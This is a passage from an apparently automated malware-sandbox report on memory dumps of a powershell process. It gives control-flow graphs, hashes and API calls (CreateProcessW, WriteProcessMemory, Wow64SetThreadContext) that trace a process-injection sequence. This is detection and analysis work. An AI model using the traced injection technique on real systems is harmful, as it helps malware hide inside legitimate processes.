                                                                                                                    • Source File: 00000007.00000002.2408878133.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_7_2_4ce0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocProcessVirtual$CreateMemoryResumeThreadWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4270437565-0
                                                                                                                    • Opcode ID: ecdf52bced2f0df66d512556100b04ca32c0c1518a67f0c40228db29ad4aefc2
                                                                                                                    • Instruction ID: d32f461f0dc39066cc892fc4874501caecb4927e1af257b6b418c0941847fda1
                                                                                                                    • Opcode Fuzzy Hash: ecdf52bced2f0df66d512556100b04ca32c0c1518a67f0c40228db29ad4aefc2
                                                                                                                    • Instruction Fuzzy Hash: 93825B74A00259CFDB24CF2AC984BAEB7F2BF44314F1484A9D55AAB250DB34BE85CF50

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1330 7bd09a8-7bd09eb 1331 7bd0bc6-7bd0c0e 1330->1331 1332 7bd09f1-7bd09f6 1330->1332 1340 7bd0d7b-7bd0dad 1331->1340 1341 7bd0c14-7bd0c19 1331->1341 1333 7bd0a0e-7bd0a12 1332->1333 1334 7bd09f8-7bd09fe 1332->1334 1338 7bd0a18-7bd0a1c 1333->1338 1339 7bd0b73-7bd0b7d 1333->1339 1336 7bd0a00 1334->1336 1337 7bd0a02-7bd0a0c 1334->1337 1336->1333 1337->1333 1342 7bd0a2f 1338->1342 1343 7bd0a1e-7bd0a2d 1338->1343 1344 7bd0b7f-7bd0b88 1339->1344 1345 7bd0b8b-7bd0b91 1339->1345 1362 7bd0dbd 1340->1362 1363 7bd0daf-7bd0dbb 1340->1363 1350 7bd0c1b-7bd0c21 1341->1350 1351 7bd0c31-7bd0c35 1341->1351 1346 7bd0a31-7bd0a33 1342->1346 1343->1346 1347 7bd0b97-7bd0ba3 1345->1347 1348 7bd0b93-7bd0b95 1345->1348 1346->1339 1354 7bd0a39-7bd0a59 1346->1354 1355 7bd0ba5-7bd0bc3 1347->1355 1348->1355 1352 7bd0c25-7bd0c2f 1350->1352 1353 7bd0c23 1350->1353 1356 7bd0c3b-7bd0c3d 1351->1356 1357 7bd0d2a-7bd0d34 1351->1357 1352->1351 1353->1351 1387 7bd0a78 1354->1387 1388 7bd0a5b-7bd0a76 1354->1388 1359 7bd0c4d 1356->1359 1360 7bd0c3f-7bd0c4b 1356->1360 1364 7bd0d36-7bd0d3f 1357->1364 1365 7bd0d42-7bd0d48 1357->1365 1368 7bd0c4f-7bd0c51 1359->1368 1360->1368 1370 7bd0dbf-7bd0dc1 1362->1370 1363->1370 1371 7bd0d4e-7bd0d5a 1365->1371 1372 7bd0d4a-7bd0d4c 1365->1372 1368->1357 1373 7bd0c57-7bd0c59 1368->1373 1374 7bd0e0d-7bd0e17 1370->1374 1375 7bd0dc3-7bd0dc9 1370->1375 1376 7bd0d5c-7bd0d78 1371->1376 1372->1376 1381 7bd0c69 1373->1381 1382 7bd0c5b-7bd0c67 1373->1382 1378 7bd0e19-7bd0e1f 1374->1378 1379 7bd0e22-7bd0e28 1374->1379 1384 7bd0dcb-7bd0dcd 1375->1384 1385 7bd0dd7-7bd0df4 1375->1385 1389 7bd0e2e-7bd0e3a 1379->1389 1390 7bd0e2a-7bd0e2c 1379->1390 1391 7bd0c6b-7bd0c6d 1381->1391 1382->1391 1384->1385 1402 7bd0e5a-7bd0e5f 1385->1402 1403 7bd0df6-7bd0e07 1385->1403 1392 7bd0a7a-7bd0a7c 1387->1392 1388->1392 1393 7bd0e3c-7bd0e57 1389->1393 1390->1393 1391->1357 1394 7bd0c73-7bd0c75 1391->1394 1392->1339 1401 7bd0a82-7bd0a84 1392->1401 1398 7bd0c8f-7bd0c93 1394->1398 1399 7bd0c77-7bd0c7d 1394->1399 1406 7bd0cad-7bd0d27 1398->1406 1407 7bd0c95-7bd0c9b 1398->1407 1404 7bd0c7f 1399->1404 1405 7bd0c81-7bd0c8d 1399->1405 1408 7bd0a94 1401->1408 1409 7bd0a86-7bd0a92 1401->1409 1402->1403 1403->1374 1404->1398 1405->1398 1414 7bd0c9d 1407->1414 1415 7bd0c9f-7bd0cab 1407->1415 1413 7bd0a96-7bd0a98 1408->1413 1409->1413 1413->1339 1417 7bd0a9e-7bd0abe 1413->1417 1414->1406 1415->1406 1425 7bd0ad6-7bd0ada 1417->1425 1426 7bd0ac0-7bd0ac6 1417->1426 1429 7bd0adc-7bd0ae2 1425->1429 1430 7bd0af4-7bd0af8 1425->1430 1427 7bd0ac8 1426->1427 1428 7bd0aca-7bd0acc 1426->1428 1427->1425 1428->1425 1431 7bd0ae4 1429->1431 1432 7bd0ae6-7bd0af2 1429->1432 1433 7bd0aff-7bd0b01 1430->1433 1431->1430 1432->1430 1435 7bd0b19-7bd0b70 1433->1435 1436 7bd0b03-7bd0b09 1433->1436 1437 7bd0b0d-7bd0b0f 1436->1437 1438 7bd0b0b 1436->1438 1437->1435 1438->1435
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.2438871747.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_7_2_7bd0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4']q$$]q$$]q
                                                                                                                    • API String ID: 0-3019551829
                                                                                                                    • Opcode ID: b5ce4dcd8a809e213e50b844cc086e76a55b10d3674418ef49ea608caede4b63
                                                                                                                    • Instruction ID: 82e9627461d6b4384ab5d29aab0ffe36e0d60da1f14429375e9d0cd66ff34430
                                                                                                                    • Opcode Fuzzy Hash: b5ce4dcd8a809e213e50b844cc086e76a55b10d3674418ef49ea608caede4b63
                                                                                                                    • Instruction Fuzzy Hash: C131C5F06083469FEB25AE38891076A7BA2EF81614F5580FAE404CB192F775CD80C772

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1440 7bd1380-7bd13c6 1441 7bd13cc-7bd13d1 1440->1441 1442 7bd1572-7bd15ba 1440->1442 1443 7bd13e9-7bd13ed 1441->1443 1444 7bd13d3-7bd13d9 1441->1444 1450 7bd16ec-7bd171d 1442->1450 1451 7bd15c0-7bd15c5 1442->1451 1448 7bd151e-7bd1528 1443->1448 1449 7bd13f3-7bd13f5 1443->1449 1445 7bd13dd-7bd13e7 1444->1445 1446 7bd13db 1444->1446 1445->1443 1446->1443 1454 7bd152a-7bd1533 1448->1454 1455 7bd1536-7bd153c 1448->1455 1452 7bd1405 1449->1452 1453 7bd13f7-7bd1403 1449->1453 1471 7bd172d 1450->1471 1472 7bd171f-7bd172b 1450->1472 1457 7bd15dd-7bd15e1 1451->1457 1458 7bd15c7-7bd15cd 1451->1458 1459 7bd1407-7bd1409 1452->1459 1453->1459 1460 7bd153e-7bd1540 1455->1460 1461 7bd1542-7bd154e 1455->1461 1464 7bd169e-7bd16a8 1457->1464 1465 7bd15e7-7bd15e9 1457->1465 1462 7bd15cf 1458->1462 1463 7bd15d1-7bd15db 1458->1463 1459->1448 1467 7bd140f-7bd1413 1459->1467 1468 7bd1550-7bd156f 1460->1468 1461->1468 1462->1457 1463->1457 1475 7bd16aa-7bd16b2 1464->1475 1476 7bd16b5-7bd16bb 1464->1476 1469 7bd15f9 1465->1469 1470 7bd15eb-7bd15f7 1465->1470 1473 7bd1415-7bd1424 1467->1473 1474 7bd1426 1467->1474 1480 7bd15fb-7bd15fd 1469->1480 1470->1480 1481 7bd172f-7bd1731 1471->1481 1472->1481 1482 7bd1428-7bd142a 1473->1482 1474->1482 1483 7bd16bd-7bd16bf 1476->1483 1484 7bd16c1-7bd16cd 1476->1484 1480->1464 1485 7bd1603-7bd1605 1480->1485 1487 7bd179f-7bd17a9 1481->1487 1488 7bd1733-7bd1752 1481->1488 1482->1448 1486 7bd1430-7bd1432 1482->1486 1489 7bd16cf-7bd16e9 1483->1489 1484->1489 1494 7bd161f-7bd162a 1485->1494 1495 7bd1607-7bd160d 1485->1495 1496 7bd1434-7bd1440 1486->1496 1497 7bd1442 1486->1497 1492 7bd17ab-7bd17af 1487->1492 1493 7bd17b2-7bd17b8 1487->1493 1520 7bd1754-7bd1760 1488->1520 1521 7bd1762 1488->1521 1500 7bd17be-7bd17ca 1493->1500 1501 7bd17ba-7bd17bc 1493->1501 1508 7bd162c-7bd1632 1494->1508 1509 7bd1642-7bd169b 1494->1509 1503 7bd160f 1495->1503 1504 7bd1611-7bd161d 1495->1504 1498 7bd1444-7bd1446 1496->1498 1497->1498 1498->1448 1506 7bd144c-7bd144e 1498->1506 1507 7bd17cc-7bd17ea 1500->1507 1501->1507 1503->1494 1504->1494 1510 7bd1468-7bd1473 1506->1510 1511 7bd1450-7bd1456 1506->1511 1516 7bd1634 1508->1516 1517 7bd1636-7bd1638 1508->1517 1523 7bd1475-7bd1478 1510->1523 1524 7bd1482-7bd148e 1510->1524 1518 7bd1458 1511->1518 1519 7bd145a-7bd1466 1511->1519 1516->1509 1517->1509 1518->1510 1519->1510 1526 7bd1764-7bd1766 1520->1526 1521->1526 1523->1524 1527 7bd149c-7bd14a3 1524->1527 1528 7bd1490-7bd1492 1524->1528 1526->1487 1529 7bd1768-7bd1785 1526->1529 1532 7bd14aa-7bd14ac 1527->1532 1528->1527 1539 7bd17ed-7bd17f2 1529->1539 1540 7bd1787-7bd1799 1529->1540 1533 7bd14ae-7bd14b4 1532->1533 1534 7bd14c4-7bd151b 1532->1534 1536 7bd14b8-7bd14ba 1533->1536 1537 7bd14b6 1533->1537 1536->1534 1537->1534 1539->1540 1540->1487
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.2438871747.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_7_2_7bd0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4']q$$]q$$]q
                                                                                                                    • API String ID: 0-3019551829
                                                                                                                    • Opcode ID: 9f77fd091702c84047160282290f1582bd3e0dd68c350a5ceb181b5d8cf59ef5
                                                                                                                    • Instruction ID: f72ee2663a02a13d8cd5f9d9b5b2804ddb156e924b0750290cd06859f902932e
                                                                                                                    • Opcode Fuzzy Hash: 9f77fd091702c84047160282290f1582bd3e0dd68c350a5ceb181b5d8cf59ef5
                                                                                                                    • Instruction Fuzzy Hash: A1319EF060030EDFEB258E1D85846A97BB1EF41615F1A85E6D8448B152F735CD81CF61

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1542 7bd02cb-7bd02d0 1543 7bd02d6-7bd02de 1542->1543 1544 7bd02d2-7bd02d4 1542->1544 1545 7bd02f6-7bd02fa 1543->1545 1546 7bd02e0-7bd02e6 1543->1546 1544->1543 1549 7bd03d7-7bd03e1 1545->1549 1550 7bd0300-7bd0302 1545->1550 1547 7bd02e8 1546->1547 1548 7bd02ea-7bd02f4 1546->1548 1547->1545 1548->1545 1551 7bd03ef-7bd03f5 1549->1551 1552 7bd03e3-7bd03ec 1549->1552 1553 7bd0304-7bd0310 1550->1553 1554 7bd0312 1550->1554 1555 7bd03fb-7bd0407 1551->1555 1556 7bd03f7-7bd03f9 1551->1556 1558 7bd0314-7bd0316 1553->1558 1554->1558 1559 7bd0409-7bd0427 1555->1559 1556->1559 1558->1549 1560 7bd031c-7bd0320 1558->1560 1562 7bd0340 1560->1562 1563 7bd0322-7bd033e 1560->1563 1564 7bd0342-7bd0344 1562->1564 1563->1564 1564->1549 1567 7bd034a-7bd035d 1564->1567 1571 7bd0363-7bd0365 1567->1571 1572 7bd037d-7bd03d4 1571->1572 1573 7bd0367-7bd036d 1571->1573 1575 7bd036f 1573->1575 1576 7bd0371-7bd0373 1573->1576 1575->1572 1576->1572
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.2438871747.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_7_2_7bd0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4']q$4']q
                                                                                                                    • API String ID: 0-3120983240
                                                                                                                    • Opcode ID: 20b0b4cc6c05661cb2676264a7cf5075ffbb902f86069732fb8a3c987477db3f
                                                                                                                    • Instruction ID: 9dca8cfec3e9c33065c70b8db8e32e7146354a783307df76e715d4160ab78a45
                                                                                                                    • Opcode Fuzzy Hash: 20b0b4cc6c05661cb2676264a7cf5075ffbb902f86069732fb8a3c987477db3f
                                                                                                                    • Instruction Fuzzy Hash: 56313AF1744206CFEB14AE69D5502BABBE1FFC9220F2484EAC4468B251FBB5CC46C751

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1577 4cecde4-4ced23e 1580 4ced248-4ced281 WriteProcessMemory 1577->1580 1581 4ced240-4ced246 1577->1581 1582 4ced28a-4ced2ab 1580->1582 1583 4ced283-4ced289 1580->1583 1581->1580 1583->1582
                                                                                                                    APIs
                                                                                                                    • WriteProcessMemory.KERNELBASE(?,00000000,00000000,1ADC789D,00000000,?,?,?,19D27798,00000000,?,04CEC383,?,00000000,?), ref: 04CED274
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.2408878133.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_7_2_4ce0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3559483778-0
                                                                                                                    • Opcode ID: 9c11dbfd81c853860d193144df1259891a40adc2317c1007f807a9117ec70175
                                                                                                                    • Instruction ID: e9ffb9b5cbadc0a7f1307eff4d5717ee3ce086369ce10234fc364936623cc0a7
                                                                                                                    • Opcode Fuzzy Hash: 9c11dbfd81c853860d193144df1259891a40adc2317c1007f807a9117ec70175
                                                                                                                    • Instruction Fuzzy Hash: 2F314D759053899FDB11CFA9D841AEEBFF4FF09310F04845AE444E7251D378A944CBA5

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1585 4ceca34-4cecab9 1588 4cecabb-4cecabe 1585->1588 1589 4cecac1-4cecac8 1585->1589 1588->1589 1590 4cecaca-4cecad0 1589->1590 1591 4cecad3-4cecae9 1589->1591 1590->1591 1592 4cecaeb-4cecaf1 1591->1592 1593 4cecaf4-4cecb97 CreateProcessW 1591->1593 1592->1593 1595 4cecb99-4cecb9f 1593->1595 1596 4cecba0-4cecc18 1593->1596 1595->1596 1603 4cecc2a-4cecc31 1596->1603 1604 4cecc1a-4cecc20 1596->1604 1605 4cecc48 1603->1605 1606 4cecc33-4cecc42 1603->1606 1604->1603 1608 4cecc49 1605->1608 1606->1605 1608->1608
                                                                                                                    APIs
                                                                                                                    • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 04CECB84
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.2408878133.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_7_2_4ce0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 963392458-0
                                                                                                                    • Opcode ID: 09c038c49fda583e83ff43ca692b84e38bb614b758142cbe9b87e01c21bc3f61
                                                                                                                    • Instruction ID: af1131084e56badb7dfc6a97cd2fd378c7f38418ebe0fe135dbc23814fd61896
                                                                                                                    • Opcode Fuzzy Hash: 09c038c49fda583e83ff43ca692b84e38bb614b758142cbe9b87e01c21bc3f61
                                                                                                                    • Instruction Fuzzy Hash: E6513C71D01259DFDB25CF5AC940BDDBBB5BF48314F0084AAE909B7250D775AA84CF90

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1609 4ce75c4-4cecab9 1611 4cecabb-4cecabe 1609->1611 1612 4cecac1-4cecac8 1609->1612 1611->1612 1613 4cecaca-4cecad0 1612->1613 1614 4cecad3-4cecae9 1612->1614 1613->1614 1615 4cecaeb-4cecaf1 1614->1615 1616 4cecaf4-4cecb97 CreateProcessW 1614->1616 1615->1616 1618 4cecb99-4cecb9f 1616->1618 1619 4cecba0-4cecc18 1616->1619 1618->1619 1626 4cecc2a-4cecc31 1619->1626 1627 4cecc1a-4cecc20 1619->1627 1628 4cecc48 1626->1628 1629 4cecc33-4cecc42 1626->1629 1627->1626 1631 4cecc49 1628->1631 1629->1628 1631->1631
                                                                                                                    APIs
                                                                                                                    • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 04CECB84
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.2408878133.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_7_2_4ce0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 963392458-0
                                                                                                                    • Opcode ID: 16508a47e1fb93df3e2bcbda30487e40c490257987dcf4e3430c080a96c50f18
                                                                                                                    • Instruction ID: fa230c8bda23679096e2ea9ec617dd79df9164a54ac78124b7348858ca128580
                                                                                                                    • Opcode Fuzzy Hash: 16508a47e1fb93df3e2bcbda30487e40c490257987dcf4e3430c080a96c50f18
                                                                                                                    • Instruction Fuzzy Hash: BC512B71D01259DFDB25CF9AC940BEDBBB5BF48314F0084AAE909B7250D775AA84CF50

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1632 4ce75e8-4ced23e 1634 4ced248-4ced281 WriteProcessMemory 1632->1634 1635 4ced240-4ced246 1632->1635 1636 4ced28a-4ced2ab 1634->1636 1637 4ced283-4ced289 1634->1637 1635->1634 1637->1636
                                                                                                                    APIs
                                                                                                                    • WriteProcessMemory.KERNELBASE(?,00000000,00000000,1ADC789D,00000000,?,?,?,19D27798,00000000,?,04CEC383,?,00000000,?), ref: 04CED274
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.2408878133.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_7_2_4ce0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3559483778-0
                                                                                                                    • Opcode ID: 841a8552f81cb7eb6669f80349f2011e1d21cc0040f94883dbf3c94262dbe483
                                                                                                                    • Instruction ID: c841ca1a07c68c93d22ec4a05143a295cca2748d066137f4550d7c89cf0a00e0
                                                                                                                    • Opcode Fuzzy Hash: 841a8552f81cb7eb6669f80349f2011e1d21cc0040f94883dbf3c94262dbe483
                                                                                                                    • Instruction Fuzzy Hash: A921F8B5900349DFDB10CF9AC984BEEBBF4FB48310F108429E519A7210D378A944CBA1

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1639 4ce75d0-4ceccc0 1641 4cecccc-4ceccf8 Wow64SetThreadContext 1639->1641 1642 4ceccc2-4ceccca 1639->1642 1643 4ceccfa-4cecd00 1641->1643 1644 4cecd01-4cecd22 1641->1644 1642->1641 1643->1644
                                                                                                                    APIs
                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,19D27798,?,?,04CEC05A), ref: 04CECCEB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.2408878133.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_7_2_4ce0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 983334009-0
                                                                                                                    • Opcode ID: ffef83db89268afa3f385b2c54727bd230461f8c7a6ff6e078ffb70721e28863
                                                                                                                    • Instruction ID: 4e2a002f5f67b65711b7032b0ab18da5a4599a33d4c7d5a4d238ae11858ed00a
                                                                                                                    • Opcode Fuzzy Hash: ffef83db89268afa3f385b2c54727bd230461f8c7a6ff6e078ffb70721e28863
                                                                                                                    • Instruction Fuzzy Hash: EC1137B2D006498FDB10CF9BC944BEEFBF5EB88320F148429E418A3200D378A545CFA5

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1646 4ce75f4-4ceccc0 1648 4cecccc-4ceccf8 Wow64SetThreadContext 1646->1648 1649 4ceccc2-4ceccca 1646->1649 1650 4ceccfa-4cecd00 1648->1650 1651 4cecd01-4cecd22 1648->1651 1649->1648 1650->1651
                                                                                                                    APIs
                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,19D27798,?,?,04CEC05A), ref: 04CECCEB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.2408878133.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_7_2_4ce0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 983334009-0
                                                                                                                    • Opcode ID: 8be46ea1b0b83fed5cf612c26570a9b7f82539827c8470cc62b79a55a7c2a9de
                                                                                                                    • Instruction ID: 1ebbcd9ba7d15d0df27417930bf8f12052fda7a91831e8ac53cf68d9c7a7151b
                                                                                                                    • Opcode Fuzzy Hash: 8be46ea1b0b83fed5cf612c26570a9b7f82539827c8470cc62b79a55a7c2a9de
                                                                                                                    • Instruction Fuzzy Hash: A01137B2D006498FDB10CF9BC944BEEFBF5EB88320F148429E418A3200D378A544CFA5
                                                                                                                    APIs
                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,19D27798,?,?,04CEC05A), ref: 04CECCEB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.2408878133.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_7_2_4ce0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 983334009-0
                                                                                                                    • Opcode ID: dcb9137b9efdb49c8b2ac9e9a374ddc9e63af5a38e5e4494cb8aaf1d424c80cb
                                                                                                                    • Instruction ID: 2eebeb39f54f924dbc59abe69693b53c03153417c24f85c7f7223dd4d2c4002e
                                                                                                                    • Opcode Fuzzy Hash: dcb9137b9efdb49c8b2ac9e9a374ddc9e63af5a38e5e4494cb8aaf1d424c80cb
                                                                                                                    • Instruction Fuzzy Hash: 101137B2C006498FDB10CF9AD844BEEFBF5FB88320F148429E418A3600D778A544CFA1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.2438871747.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_7_2_7bd0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4']q
                                                                                                                    • API String ID: 0-1259897404
                                                                                                                    • Opcode ID: 44d3397e63ad8f9f32a6fbe016fa88845d6c232b3307dfd6d52b70328445b137
                                                                                                                    • Instruction ID: 596e0e771762471a09cb4f5fc0dfd3dd9aa6bb8d12b2e2fd4d48556edeafa1ab
                                                                                                                    • Opcode Fuzzy Hash: 44d3397e63ad8f9f32a6fbe016fa88845d6c232b3307dfd6d52b70328445b137
                                                                                                                    • Instruction Fuzzy Hash: 5521E4F0A0528ADFEB248F29C540AE97BE1FF41221F0980E6D4188B261F735DC85CB92
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.2407371423.00000000033AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033AD000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_7_2_33ad000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7beb8f965cb69ec7674962d7c0616e8cc1a6fd5ba4c4c26deab8ae857590031c
                                                                                                                    • Instruction ID: a34e95226799caf860c13d289657f5f7602e20c2f1a2ff2ca368293c841dc866
                                                                                                                    • Opcode Fuzzy Hash: 7beb8f965cb69ec7674962d7c0616e8cc1a6fd5ba4c4c26deab8ae857590031c
                                                                                                                    • Instruction Fuzzy Hash: 4801696240D7C09ED7128B298C94752BFA8EF57224F0D84DBE8888F6A7C2685845D772
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.2407371423.00000000033AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033AD000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_7_2_33ad000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7f04c58dc1bee9ee96d867f4b816bfbda80628b190016643f011f098e30a9d13
                                                                                                                    • Instruction ID: ed8268a332d78ae670e6e89dc0cb4afea4a1c2fd40835e2f4b155c5ef50dc9db
                                                                                                                    • Opcode Fuzzy Hash: 7f04c58dc1bee9ee96d867f4b816bfbda80628b190016643f011f098e30a9d13
                                                                                                                    • Instruction Fuzzy Hash: FA018F71405B449AE720CA2ACDC4B67FF9CEF46724F18C46AED480AA46C27D9841DAB1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.2408878133.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_7_2_4ce0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 35c44de69c15b379f39bb6453a7c16caa00a3b7b1a451805e524d876e6a8a0f3
                                                                                                                    • Instruction ID: b36c52843accb4b4dbc5229705b17701090a8c6ceb1c834be30f490d942d92d6
                                                                                                                    • Opcode Fuzzy Hash: 35c44de69c15b379f39bb6453a7c16caa00a3b7b1a451805e524d876e6a8a0f3
                                                                                                                    • Instruction Fuzzy Hash: FCF1C175A04209DFDB11CF9AD980ABEB7B3FF44300F158966E4069B241E736F986CB91
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.2438871747.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_7_2_7bd0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $]q$$]q$$]q$$]q
                                                                                                                    • API String ID: 0-858218434
                                                                                                                    • Opcode ID: a322316633fba42d4a6990de3679802ed074f6d18a29ad91aed2f1f0e9603194
                                                                                                                    • Instruction ID: 952fe856dc38184f8d18513601afdb77a90650fdbcf3a0c9a57b2d975d0b1b2e
                                                                                                                    • Opcode Fuzzy Hash: a322316633fba42d4a6990de3679802ed074f6d18a29ad91aed2f1f0e9603194
                                                                                                                    • Instruction Fuzzy Hash: 092181F1A1430BAFFB34AE598580766B7E5EB45610F1840E7DC4987241F731DC41CB91
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.2438871747.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_7_2_7bd0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4']q$4']q$$]q$$]q
                                                                                                                    • API String ID: 0-978391646
                                                                                                                    • Opcode ID: c0960484b1cd83df73be86fac301c30e84cad4bbfe087970b73a6cc2f28543a2
                                                                                                                    • Instruction ID: d1f944d55cafa53273acaa21641244ec8715753e4a278b94547b0585d216400d
                                                                                                                    • Opcode Fuzzy Hash: c0960484b1cd83df73be86fac301c30e84cad4bbfe087970b73a6cc2f28543a2
